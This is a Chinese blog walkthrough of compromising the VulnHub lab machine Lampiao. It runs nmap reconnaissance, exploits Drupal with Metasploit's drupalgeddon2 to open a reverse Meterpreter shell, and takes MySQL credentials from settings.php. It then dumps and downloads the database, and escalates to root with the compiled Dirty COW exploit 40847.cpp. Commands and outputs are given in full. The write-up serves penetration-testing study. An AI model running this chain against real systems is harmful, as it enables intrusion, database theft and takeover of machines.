提权(1), 脱裤, dirty-cow 脏牛提权

最新推荐文章于 2024-05-05 18:56:51 发布
最新推荐文章于 2024-05-05 18:56:51 发布
阅读量193 收藏
点赞数
分类专栏: 渗透测试-入侵提权 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bua200720411091/article/details/134769878
版权

提权(1), 脱裤, dirty-cow脏牛提权

本实验以打靶为案例演示脱裤dirty-cow脏牛提权的操作过程.

实验环境:

靶机: https://www.vulnhub.com/entry/lampiao-1,249/

本地: 192.168.112.201, kali
目标: 192.168.112.202

一, 信息搜集

扫描全端口:
nmap -p- 192.168.112.202

22/tcp   open  ssh
80/tcp   open  http
1898/tcp open  cymtec-port

扫描端口服务的版本, 操作系统信息等:
nmap -sV -A 192.168.112.202

22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 46b199607d81693cae1fc7ffc366e310 (DSA)
|   2048 f3e888f22dd0b2540b9cad6133595593 (RSA)
|   256 ce632af7536e46e2ae81e3ffb716f452 (ECDSA)
|_  256 c655ca073765e306c1d65b77dc23dfcc (ED25519)
80/tcp open  http?
| fingerprint-strings: 
|   NULL: 
AC Address: 00:0C:29:CB:D6:D6 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

这里发现没有出现80, 1898的指纹. 1898不是常用端口, 单独扫一下看看.
nmap -sV -p1898 192.168.112.202

    1898/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))

发现1898端口开着apache, 这可能是个网站, 尝试访问网站.

用浏览器访问80端口, 发现不是网站页面.
用浏览器访问1898端口, 发现网站页面, 观察一下页面.
在页面最下方发现 Powered by Drupal 说明可能是用 Drupal CMS开发的.

扫描网站指纹确认一下:
whatweb 192.168.112.202:1898

Drupal 7 (http://drupal.org)], PHP[5.5.9-1ubuntu4.24]

二, 漏洞利用

进入MSF, 搜索 Drupal 相关的模块.
search drupal

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   1  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   3  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   4  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   5  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   6  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution


Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval

选drupal_drupalgeddon2做尝试:
use 1

msf6 exploit(unix/webapp/drupal_drupalgeddon2) >

查看选项参数:
show options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host

设置 rhosts 和 rport:
set rhosts 192.168.112.202
set rport 1898

执行模块脚本:
run

[*] Started reverse TCP handler on 192.168.112.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (39927 bytes) to 192.168.112.202
[*] Meterpreter session 2 opened (192.168.112.201:4444 -> 192.168.112.202:56586) at 2023-12-01 09:08:43 -0500

meterpreter >

这里进入了 meterpreter 环境, 漏洞利用成功.

三, 脱裤

反弹shell:
shell

Process 26184 created.
Channel 0 created.

用python开启虚拟bash:
python -c ‘import pty;pty.spawn(“/bin/bash”)’

www-data@lampiao:/var/www/html$

一般CMS都有默认的配置文件路径, 可以从网上去搜索.
找到 drupal CMS 的配置文件 sites/default/settings.php:
打开文件, 找到数据库的配置信息:

'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'Virgulino',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',

那么这里看到了mysql的用户名, 密码, 数据库名.

检查mysqldump命令:
whereis mysqldump

mysqldump: /usr/bin/mysqldump /usr/share/man/man1/mysqldump.1.gz

脱裤:
mysqldump -udrupaluser -pVirgulino drupal > drupal.sql

退回 meterpreter 控制台:
exit

下载 drupal.sql 文件到本地:
download drupal.sql /root

四, Dirty-Cow 脏牛提权

linux系统尝试脏牛漏洞提权, Dirty-Cow

1. 查看当前用户权限

getuid

Server username: www-data

反弹shell:
shell

Process 27216 created.
Channel 1 created.

用python开启虚拟bash:
python -c ‘import pty;pty.spawn(“/bin/bash”)’

2. 检查目标的编译环境

python --version
php -v
gcc -v

Python 2.7.6

PHP 5.5.9-1ubuntu4.24 (cli) (built: Mar 16 2018 12:32:06) 
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
    with Zend OPcache v7.0.3, Copyright (c) 1999-2014, by Zend Technologies
    
gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.4)
2. kali搜索脏牛代码

dirty-cow不在msf的模块库中, 所以需要在网上或者kali中单独搜索.
网站搜索: exploit-db.com
searchsploit dirty

-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                            |  Path
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1)                                                    | linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)                                                    | linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method)        | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)           | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method)                              | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)        | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)                               | linux/local/40611.c
Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)                                                       | linux/local/50808.c
Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL                                           | android/dos/46941.txt
Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion                                                 | php/webapps/4603.txt
Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion                                                  | php/webapps/3729.txt
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)                                                       | linux/local/46361.py
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)                                                       | linux/local/46362.py
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

通常使用 /etc/passwd 方法提权, 40839.c40847.cpp, 这两个是c或c++源码, 需要编译才能使用.

3. 尝试 40847.cpp 提权

查看源码的路径:
searchsploit -p 40847

 Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)
      URL: https://www.exploit-db.com/exploits/40847
     Path: /usr/share/exploitdb/exploits/linux/local/40847.cpp
    Codes: CVE-2016-5195
 Verified: True
File Type: C++ source, ASCII text

查看源码注释:
vi /usr/share/exploitdb/exploits/linux/local/40847.cpp

// EDB-Note: Compile:   g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
// EDB-Note: Recommended way to run:   ./dcow -s    (Will automatically do "echo 0 > /proc/sys/vm/dirty_writeback_centisecs")

从 meterpreter 上传代码到目标主机/tmp目录下:
upload /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp

反弹shell:
shell

进入虚拟bash:
python -c ‘import pty;pty.spawn(“/bin/bash”)’

www-data@lampiao:/var/www/html$

进入/tmp目录编译源码:
这行代码编译出一个 dcow 可执行文件.
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

<-Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

执行程序:
./dcow -s

Running ...
Password overridden to: dirtyCowFun

Received su prompt (Password: )

root@lampiao:~# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
root@lampiao:~# cp /tmp/.ssh_bak /etc/passwd
root@lampiao:~# rm /tmp/.ssh_bak
root@lampiao:~#

root提权成功.

查看权限:
id

uid=0(root) gid=0(root) groups=0(root)

修改root密码:
passwd

Enter new UNIX password: root  
Retype new UNIX password: root
passwd: password updated successfully
DeltaTime
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
脏牛提权(靶机复现)
tubug的博客
03-26 1490
脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。漏洞范围Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)漏洞编号脏牛的CVE编号是CVE-2016-5195。漏洞危害低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权漏洞原理。
android系统dirty cow(脏牛)漏洞的检查资料
03-22
压缩包中包含:测试脏牛漏洞的c程序源代码、编译后的执行文件(在android系统中运行的)、测试文档
脱裤打包 php马
05-07
脱裤打包 php马
dirty-chai:用不掉毛的终止声明扩展Ch​​ai
04-14
脏柴 终止断言属性的函数形式。 安装 npm install dirty-chai --save-dev 用法 dirty-chai是一个chai。 var chai = require ( 'chai' ) ; var dirtyChai = require ( 'dirty-chai' ) ; var expect = chai . expect chai . use ( dirtyChai ) ; // ... expect ( true ) . to . be . true ( ) ; 自定义错误消息 使用此函数形式终止属性,您还可以提供自定义错误消息,以显示断言失败的时间。 无论断言是在链的中间还是在末尾,这都行得通。 expect ( true ) . to . be . true . and . not . false ( 'Reason: Paradox' ) ; ex
dirty-needle
06-10
脏针 介绍 PHP 的依赖注入容器 设置一个返回 PHP 数组的配置文件,如下所示: <?php return array ( 'dirty-needle' => array ( '@dependency' => array ( 'class' => '\Dependency' ), '@class-with-dependency' => array ( 'class' => '\ClassWithDependency' , 'arguments' => array ( '@dependency' ) ), ), ); 然后从容器中取出东西,如下所示: $ diContain
denoising-dirty-documents:去脏文档
05-05
清除脏文件 先决条件 我们使用了修改过的版本的 ,其中添加了通用的Maxout图层。 配置文件说明 配置文件必须提供两个功能: get()返回“ model”,“ data_train”和“ data_val”的字典 get_data(list_path)位于list_path的文件的内容是两条图像路径,分别是一条线,名称分别为X和y。 此函数应返回一个轴为(c,h,w)的numpy数组列表,表示多通道图像。 我们在(1,c,h,w)图像上运行由get()给出的模型,它应生成尺寸与y相同的图像
每周打靶VulnHub靶机-DOUBLETROUBLE_ 1
最新发布
m0_54178755的博客
05-05 851
每周打靶VulnHub靶机-DOUBLETROUBLE_ 1
2020-11-26
cdwtsh1的博客
11-26 289
冀教版英语三至六年级单词汇总 一 one 2. 二 two 3. 三 three 4. 四 four 5. 五 five 6. 六 six 七 seven 8. 八 eight 9. 九 nine 10. 十 ten 十一 eleven 2. 十二 twelve 3. 十三 thirteen 4. 十四 fourteen 十五 fifteen 6. 十六 sixteen 7. 十七 seventeen 8. 十八 eighteen 十九 nineteen 10. 二十 twenty 11. 三十 thir
背句子,记单词1
weixin_30776273的博客
04-29 3559
7000词汇这么背我比较可以接受,连续看20天足以过八级!!(16天完整版) 16天记住7000考研词汇(第一天) 1.With my own ears I clearly heard the heart beat of the nuclear bomb. 我亲耳清楚地听到原子弹的心脏的跳动。 2. Next year the bearded bear will bear...
英语考研词汇
血染风采2019
09-20 1万+
1.With my own ears I clearly heard theheart beat of the nuclear bomb. 我亲耳清楚地听到原子弹的心脏的跳动。 2. Next year the bearded bear will bear adear baby in the rear. 明年,长胡子的熊将在后方产一头可爱的小崽. 3. Early I searched t
红色永利百人牛牛源代码
04-13
红色永利百人牛牛源代码,仅子游戏.
复旦大学_软件安全_SEED labs_5-Dirty_Cow.zip
06-27
复旦大学_软件安全_SEED labs_5-Dirty_Cow实验 是从雪城大学SEED labs上找的实验 资源包括: 攻击修改代码、实验报告详细版、实验指导书、参考链接
dirtycow脏牛linux提权exp
03-25
dirtycow脏牛linux提权exp
webrtc-streamer-v0.8.1-dirty-Windows-AMD64-Release.zip
01-26
webrtc-streamer-v0.8.1-dirty-Windows-AMD64-Release.zip
android4.*通杀漏洞dirty-cow源代码
01-21
该漏洞具体为,Linux内核的内存子系统在处理写入时复制(copy-on-write, COW)时产生了竞争条件(race condition)。恶意用户可利用此漏洞,来获取高权限,对只读内存映射进行写访问。(A race condition was found ...
bilibili【考研英语词汇】
热门推荐
echoecho的博客
02-27 49万+
1、abandon vt.离弃,遗弃,抛弃;放弃。 放纵,放弃 a-否定(前缀)band-布带on 布带不在自己身上,放纵,放弃 band n.条,带;乐队;波段;v.绑扎 一群人绑在一起:乐队,一群 bandagen绷带v用绷带扎缚 -age永恒的(后缀) band- ~ban-(前缀) banner横幅,旗帜(商店的旗帜) 在小带子上写的字:slogan...
传说中的800句记7000词
Believe in the Future的专栏
09-11 2万+
登录 | 注册 ZHB_McCoy的专栏 目录视图摘要视图订阅 一键管理你的代码     攒课--我的学习我做主     【hot】直播技术精选     关闭   传说中的800句记7000词
常见英语翻译带音标
m0_67133168的博客
01-03 1270
【代码】含编程常见英语翻译带音标。
脏牛 Dirty COW(CVE-2016-5195)
06-07
脏牛Dirty COW)是一种Linux内核漏洞,漏洞编号为CVE-2016-5195。攻击者可以利用该漏洞获取系统管理员权限,进而控制整个系统。 Dirty COW漏洞源于Linux内核对Copy-On-Write(COW)机制的实现不当。攻击者可以通过修改系统中的共享库,以此触发内核中的缺陷,从而突破Linux系统的安全机制。 Dirty COW漏洞被发现后,Linux社区及时发布了修复补丁,建议用户及时更新系统。同时,用户还可以通过以下措施来防范脏牛漏洞的攻击: 1. 安装最新的系统补丁,包括内核和共享库等。 2. 禁用SUID/SGID权限,即不允许普通用户以超级用户身份运行某些程序。 3. 避免在生产环境下使用过时的、未经验证的软件程序。 4. 控制系统对外开放的端口和服务,尽可能减少攻击面。 5. 定期进行安全审计和漏洞扫描,及时发现和修复安全漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值